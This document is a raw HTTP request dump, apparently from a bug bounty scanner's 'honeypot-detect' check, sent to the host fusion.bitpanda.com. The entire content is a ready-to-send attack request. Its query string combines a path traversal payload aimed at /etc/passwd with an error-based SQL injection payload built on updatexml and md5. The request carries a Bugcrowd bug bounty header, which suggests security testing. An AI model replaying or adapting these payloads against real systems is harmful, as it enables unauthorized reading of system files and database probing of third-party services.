[honeypot-detect] Dumped HTTP request for http://fusion.bitpanda.com/?30rugxNo91H3eMIrN0EA2U4XCCp=../../../../../../../../etc/passwd&30rugxNo91H3eMIrN0EA2U4XCCp=1%20and%20updatexml(1,concat(0x7e,(select%20md5(16119))),1)


GET /?30rugxNo91H3eMIrN0EA2U4XCCp=../../../../../../../../etc/passwd&30rugxNo91H3eMIrN0EA2U4XCCp=1%20and%20updatexml(1,concat(0x7e,(select%20md5(16119))),1) HTTP/1.1
Host: fusion.bitpanda.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/107.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


